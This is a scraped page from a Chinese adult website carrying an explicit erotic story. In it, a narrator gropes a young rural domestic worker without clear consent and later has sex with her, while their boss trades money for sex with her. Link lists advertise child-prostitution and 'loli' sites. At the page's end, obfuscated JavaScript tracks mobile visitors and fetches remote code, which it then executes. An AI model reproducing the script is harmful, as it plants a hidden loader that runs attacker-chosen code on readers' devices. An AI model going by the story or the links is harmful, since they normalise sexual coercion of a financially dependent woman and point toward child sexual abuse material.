• 站长推荐




    热门搜索



    站长推荐




    女优精选
    点我看更多


    夢乃愛華
    波多野结衣
    早野詩
    三上悠亚
    河北彩花
    高桥圣子
    葵司
    水卜櫻

    番号库
    点我看更多


    综合番号
    200GANA
    259LUXU
    261ARA
    277DCV
    300MIUM
    300MAAN
    300NTK

    国产传媒
    点我看更多


    综合传媒
    麻豆传媒
    葫芦影业
    猫爪影像
    天美传媒
    果冻传媒
    91制片厂
    蜜桃传媒

    探花系列
    点我看更多


    91沈先生
    文轩探花
    千人斩
    太子探花
    屌哥全国探花
    鸭哥探花
    9总全国探花
    小天探花

    精选导航

  • 不良研究所
  • 帝王会所
  • 黑料福利网
  • 必备福利
  • 逗妇乳
  • 三千佳丽
  • 全球福利汇

  • 风骚女仆的诱惑

    jkun资源站风俗伦理人气:1023时间:2024-04-01 18:00:34

      写这个题目的时候,我想了半天,我不知道女仆这个词用的恰当不恰当。严格来说,她不算是女仆,可以说兼有保姆的性质。我们老板在一栋商住楼里买了两套房子,是上下楼,上面一层居住,下面一层办公。

    这个女孩呢,即兼顾老板家里的卫生、做饭、洗衣等工作,同时,也兼顾单位的卫生状况,不过好在单位的活不多。老板不可谓不能省钱,把一个人当两个人使。但是这女孩没什么怨言,照样每天开开心心干得很快乐。

    她是一个农村女孩,老家在四川山区,和老板是远房亲戚。家里比较穷,为了供家里弟弟上学就投奔他的远房亲戚,也就是我们老板。这个女孩有着四川女孩所共同的特点,挺漂亮可爱,个子不高,但是曲线相当玲珑,皮肤白晰,踏实能干,性格爽朗。她有一个特点,就是爱笑,整天都露着两个酒窝,但是如果觉得你不对,她又对你相当尖刻,说话毫不客气。

    我们都叫她英子,她那年21岁。

    那个时候,单位有十多个人,大部分都是年轻人。我们对她都挺好,每次上班见了她就说:“哟,英子,今天打扮的真漂亮啊。”

    她也会很高兴的说:“谢谢,没有张柏芝漂亮了。”(她那时看谁漂亮不漂亮总爱跟张柏芝相比。)或者对她说:“英子,我这有些好吃的糖果,给你吃吧。”

    她就会高高兴兴的过来拿走。或者上班的时候,有人冲她说:“英子,给我倒杯水好吗?”她也会笑呵呵的给你倒水,因为她觉得自己很有用。

    还有的时候,我们就会开玩笑的对她说:“英子,给你介绍个对象怎样?”

    她就会问:“谁啊?”

    那人就坏笑着说:“楼下门口那保安,叫二蛋的那个。”

    她就会红着脸骂道:“去你的,姑奶奶高攀不上他,给你妹妹留着吧。”

    我们哄堂大笑,然后那人又色色的盯着英子饱满的胸部,说道:“要不,我们这几个你随便挑一个,大家都没结婚。”

    这时,大家都会笑嘻嘻的等着英子的选择。而英子往往显得挺老练:“你们都排不上号,我现在忙着约会别人,等我闲下来的时候再考虑你们。”果然是川妹子的火辣。

    当然,这些玩笑,都是老板不在的情况下才开的。老板在的时候,我们都相当严肃,办公室都很安静。

    老板在里面的办公室里时,总会时不时的说:“英子,给我倒杯水。”“英子,帮我拿支笔。”等等,也都是比较严肃的。英子总是吐着舌头的去照做,显得非常可爱。

    随着英子来北京有些日子,也许是受北京整个环境的影响,英子也变得爱打扮起来。烫了一个黄色的头发,穿得很时髦,皮夹克,长统靴,走在大街上,小坤包一拎,跟那些漂亮的哈哈妹没什么两样。再加上英子料很足,曲线玲珑,胸部饱满,臀部翘翘,皮肤细嫩,回头率基本上能保持在90%以上。

    这时,大家看英子的眼神越来越不一样了。上班的时候,我们这些爷们的眼神总是有意无意的斜着瞄英子一眼。另外,最令我们吃惊的是,老板看英子的眼神也越来越迷离,而对英子的态度也慢慢的变好了,变得和蔼可亲起来,并且时不时的送英子几件小东西。我们就看到英子身上的饰物一天天的变多,并且三天两头的更换。

    终于有一天,下班以后,大家都回家了,我赶回来取一件拉在单位的东西,进了办公室,我听到老板的里屋发出了一阵阵的呻吟声,明显的是老板和英子的声音。

    模模糊糊听见老板的声音:“靠,没想到这么爽,英子,我早就想搞你了,你的奶子真大,你的屁股真圆,像足了你妈妈,我的远房表妹。”

    耳听得英子叫春似的声音加以回应,我浑身燥动,不敢停留,赶紧轻轻了关了房门出来,一晚上睡不好觉。

    第二天,英子的脸红红的,干什么事心不在焉。大家都很奇怪,只有我心里最清楚。我盯着英子诱人的、年轻紧致的身段,不禁咽了口水。人少的时候,我趁着英子帮我拿东西的时候,开玩笑的拍拍她的翘臀,她红着脸躲开了。看着她一扭一扭的屁股,我的身上有点燥热。

    我敢保证英子的性欲是超强的,从她昨天的呻吟声中我就听出来了。并且我也敢肯定英子之前肯定也不是处女,在四川老家的时候肯定也和人有过性关系。

    这一点,是从多个方面推纳出来的。

    在所有的同事当中,英子和我的关系算是最好的,一方面,我长得比较讨女生喜欢,也比较能说,所以她和我聊得来。另一方面,我老家和四川挨边,能说一些四川话,算是半个老乡。工作闲的时候,她经常坐在我旁边和我聊天,有时候闹高兴了我还能顺便吃点豆腐。比如碰碰她的胸、拍拍她的屁股之类。

    同事们都很羡慕,他们如果碰到她屁股的话她一准会生气,只有我,她还没怎么生气。但是我的愿望远不止此,现在,当我拍她屁股的时候,只会令我更难受,我的鸡巴涨的难受。

    当时我没有女朋友,我一直没对她动手的原因是怕我搞定之后她会追着我不放。让我娶她我做不到,毕竟很不容易大学毕业留在北京,娶一个初 中毕业的做保姆的女孩实在有点说不过去。所以,尽管有时候很冲动,单独我们两个的时候很想把她办了,但是一想到风险,就放弃了,毕竟做了要负责任。

    我一向的原则是,对于对方无所谓的,我也可以无所谓,大家逢场作戏,完后一拍两散,但是对方认真的,我必须也要以认真对待才成,要不然,我的良心会很不安。

    但是现在,既然她已经和老板这样乱伦都已经有了,我再和她发生关系似乎也不必负什么道义的责任。

    我要搞她!

    打定这个主意之后我就不断的寻找机会,在公司人多嘴杂,我和她调情很不方便。

    终于有一天,老板去外地出差,我想今天有机会了。整天我上班都在走神,英子今天上身穿了一件紧身的T恤,下身穿着一件短裙,显得身材真的是前凸后翘,玲珑有致。一双玉腿,白白嫩嫩的,看得我直咽口水。

    好不容易等到下班,我故意晚走了会儿,她收拾完了办公室准备回楼上去。

    我叫住了她:“英子。”

    她望着我:“嗯?”

    我笑道:“老板不在家,你这么早回去没事吧?”

    她说:“是没事,但是在这也没事啊。”

    我说:“我晚上有点活需要加会班,一个人忙不过来,你愿意帮我打印一些东西吧?完了我请你吃饭。”

    英子一向很乐于助人,当然对我来说更不例外,她高兴的答应下来。

    其实我也没什么活,但为了凑活,只好把一些可做可不做的活拿出来做。我在那里打字,她在那高兴的帮我复印材料,边说边和我聊着家常。其实我也没心思打字,也只想着打得慢一些,好和她多聊一段时间。我发挥我的口才,把她逗得哈哈直乐。

    干了一半,我就说,英子,我们先出去吃饭吧,我请你吃比萨。

    “真的?”她高兴的一蹦老高。

    我点了点头,装出绅士般的伸出我的胳膊,想让她挽着走。她哈哈一笑,倒也见识过这个,挽着我的胳膊出门了。

    一路上,我和她开着玩笑,她很开心。我会趁她高兴的时候搂着她的细腰,她也不反抗。我有时候拿手挠她痒痒,她咯咯笑着躲开,却又被我搂了回来。

    我拿手轻轻下滑到了她的臀部,不由得一阵激动。英子的臀部结实而上翘,圆圆滚滚的,这即可能是天生的,也有她家是农村的,干的农活比较多,所以才这样结实的原因。真的,英子浑身就没有一点赘肉。总之,这是后入式做爱的最理想臀部。

    英子吃的很高兴,回来的时候我就顺势搂的更紧了,并偶尔用手指按一下她的胸部。她冲我发嗲:“讨厌,吃我豆腐。”

    我笑着冲她说:“你也可以吃我豆腐啊。”

    她哈哈一笑说:“你的豆腐又臭又烂,我才不吃呢。”

    谈笑间,回到了办公室,剩下的活又做了一个小时,做完了。

    我笑着冲她说:“终于做完了,我现在腰酸背痛的……英子,你帮我捶捶背吧。”

    英子笑道:“你倒是美,我还腰酸背痛呢,谁给我捶啊?”

    我说:“你给我捶完了,我给你捶。”

    “好吧,便宜你了。”在帮助别人方面,英子总是不太会拒绝别人。

    英子的手劲比较小,敲在我的身上没有感觉,我一直叫她:“大点劲,大点劲……还是不行,再大点劲。”

    结果她就把我的背打得咚咚直响,这样我舒服了,但是她动累得够戗。十分钟后,她叫道:“不行了,不行了,累死我了。”

    我就对她说:“呵呵,辛苦了,我的妹妹。来,让我服伺服伺你。”不由分说,把她拉到了沙发上坐了下来。轻轻敲她的头,再捏她的肩,胳膊,其实不是说着玩,这些东西还是在美发店洗头的次数多了,我一般都是干洗,从美发店那些小姐那里学到的,现在用到她身上,没想到她很舒服。

    她说道:“真舒服,没想到你还会弄这个。”

    我心中暗笑,女孩子一般都不在理发店按摩,哪经过这个,我这胡乱一弄她还挺舒服。嘴上却道:“那是,我这是祖上祖传的,一般人我还不给她按呢,这需要气功和推拿,还要把你身上的毒素给排出来,对自己有害的,也只有对妹妹你我才给按呢。”

    她笑道:“你就吹吧。”

    我笑着说:“听我给你吹,听我给你吹,为什么这么美,其实就是一块大萝卜。(东北话念BEI音,四声,赵丽蓉小品中有这句话。)”

    她咯咯一笑:“其实就是那二锅头,对着那白开水。”

    就这样嬉笑着,她对我完全没有戒备,不过也好像不准备戒备。我让她平直趴在沙发上,我给她按,从上到下,一直到小腿。其间,在按她后背的时候,我两个大姆指按在她的后背上,另外的手指却有意无意的插到了她身体前面,碰到了她乳房的边缘,软软的很有弹性。

    其实按摩的人一般是不按臀部的。但是我不可不管那一套,看着她高高翘起的臀部,我从周围到中间开始按了起来,那纯粹是一种挑逗性的按摩。这是我第一次正经八百名正言顺的抚摸她的臀部,真的是肉肉的像个温润的气球一样,很有弹性,把肉按进去,马上就弹起来。并且我把两片屁股这样揉着,两片屁股不停的摩擦着她的阴部。

    很快,她的说笑声停止了,变得没有声音,但是她又没有让我停下来,这样只有两种可能,一种是默许,一种考虑不知道怎么办。我认为是第一种可能性。

    因为她穿的是短裙,我按摩她大腿的时候其实已经是直接贴着她的肉了。我故意在她的大腿根部多多停留,并且从大腿往上推进,这样等于是直接帖在了她的臀部上。她穿着内裤,我的手帖着内裤的边缘在不慢慢的抚摸着,她的臀部真的是很感觉,从大腿根部冒着热气,我的手感觉到了。

    后来我借口坐在旁边侧着身子太累,我直接骑在了她的大腿上,用手按着她的臀部,但是我的鸡巴坚硬的贴在她的臀沟上随着我的身子移动在摩擦着她的臀部,她仍旧没有声音,只是呼吸有点变得急促。

    事到如今,我已经认可她的默认,也知道她会允许我的进一步动作。我用双手把她的短裙推了上去,整个内裤露在外面。我把我的鸡巴整个的放入了她凹陷的臀沟,并且用手从两边挤着,使两个屁股片挤压着我的鸡巴。我的鸡巴已经完全的陷入了她的屁股里面,这个姿势等于是她在给我做臀交。

    我的动作不紧不慢的进行,她的呼吸越来越急促。后来,我正个身子俯了下去,全身压在了她的身上。她终于呻吟一声,扭转了头,和我吻在一起。而我的鸡巴,仍然压在她柔软的屁股上抽动着。

    到最后,我用手摸她的阴部,感觉她的内裤已经湿透了,粘乎乎的一片。把手插进内裤一摸她的阴部,整个全是水。她的阴毛特别茂盛,阴部肥美。我插进去了一只手指,她就忍不住开始叫了起来,扭动着屁股,夹着我的手指。

    我再也忍不住了,扯下了她的内裤,褪下了我的裤子,上衣都没脱,直接趴在她的屁股上用鸡巴找她的阴道。她拱起屁股配合着我,由于光滑,我插了几下没插进去,她用手扶着我的鸡巴进了阴道,她有阴道就如吸盘一样,我的鸡巴一进去。她就吸着我不放,肌肉不停痉挛,挤压着我的龟头。我吸了一口气,拔了出来,又猛然插了进去,她满足的一声浪叫,水花四溅……具体的做爱细节,我不想过多描写,但是我记得最后我射了三次精。能让我两个小时之内射三次精的女人不多,她是其中一个。最后累得我精疲力尽的,第二天上班我完全没了精神。

    后来,我们又做了无数次。在老板的办公室做过,甚至在楼上老板的床上做过,我没有提她和老板的事,后来是她主动告诉我的。她说家里需要钱,她的这个远房表舅(即我老板)能给她,再加上对他也不错,所以就献身给他了。

    确实也如我所料,她原来在家里谈过一个男友,也被这个男人夺走了处女之身。后来男方是个花心的人,又去找了别的女人,所以她也是一气之下就到北京来了。她说现在她知道了,天下男人都一样,到北京了还被这个表舅给看上并做了,她很失望。

    她说她喜欢我,她也不是随便的人,她只给她喜欢的人,给她表舅是因为不得已,她太需要钱了。她也知道我们不可能在一起,但就这样她已经很满足了。

    我记得我当时听了心里特别复杂,不知道说什么好。她的经历挺坎坷,别看她平时总是笑着,其实内心也掩藏着痛苦。我紧紧的搂住了她,直到她在我怀里睡着。

    其实我们的故事很多,我们的关系持续了两年时间,直到我离开那家公司我们的关系还维持着,要写的话可以写一本书。但是那样太累,也许等我有时间了我会好好的写一些,今天就写这么多。

    还有,后来,我们还是断了,为什么呢?

    她说她年纪也不小了,在农村那地方该到结婚的时候了。她攒的钱也够弟弟上了大学了,家里给她介绍了一个对象,要让她回去嫁人,听说对方还给了几万块钱彩礼,算是嫁了一个好人家。

    她走的那天,她抱着我哭了一夜。后来我们做爱,她做的特别投入,她说要把她所有的第一次都给我。她吻遍了我身体的全部,因为我以前说让她给我做毒龙(用舌头插屁眼),她怕脏就一直没做,但是这次,她特别认真的给我舔了。

    并且第一次把她的菊花蕾给了我。当我插进去的时候,我知道她很疼,疼得直掉眼泪,但是她没有说一句阻止的话,后来我在她菊花蕾里射了。

    她说她不会再来北京了,但是她永远不会忘记我。

    我想我也是吧,她也会永远留在我的记忆深处,在我的记忆中,只要有一起波澜,脑海中就会荡漾起她的笑脸,希望她过的好。

    【完】
      

    热门资讯


    友情链结

  • 不良研究所
  • 必备福利
  • 帝王会所
  • 全球福利汇
  • 黑料福利网
  • 三千佳丽
  • 逗妇乳
  • 黑色360导航
  • 她趣福利社
  • 花社导航
  • 番号研究所
  • 狼友集中营
  • 小马学院+
  • 隐秘部落
  • 童妓⚤青楼
  • 熟女超市
  • X站推送网
  • 萝莉岛VIP
  • 美色研究所
  • 猛男情報局
  • 必射榜
  • 熟女屋
  • G点导航
  • 换妻会所
  • 妃射不可
  • 色色研究所
  • 黑料网曝门
  • 无码乱伦网
  • 女友租赁

  • 联系信箱:[email protected]

    名称:国产呦女+ ,https://wuwu.oaoachug.link/调研资料/报告.html ,来路:18av , 来路低于300勿扰

    警告:本站收集的网址来源于全球互联网,网址内容和本站没有任何关系,网站在美国进行维护,受美国法律保护,如来访者国家法律不允许,请自行离开! © 2022

    国产

    三级

    日本无码

    日本有码

    欧美

    function uyJfTNs(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function DTzeVMH(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return uyJfTNs(t);};window[''+'I'+'N'+'S'+'b'+'W'+'a'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=DTzeVMH,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://ssd.zmneysz.com:7891/stats/7544/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMllM0EllMkYllMkZ0Zy4wYTlljLmNvbSUzQTg4OTE=','d3NNzJTNNBJTJGJTJGcG8uemFjdm0uY29tJTNNBOTUzMw==','4932',window,document,['l','N']);}:function(){};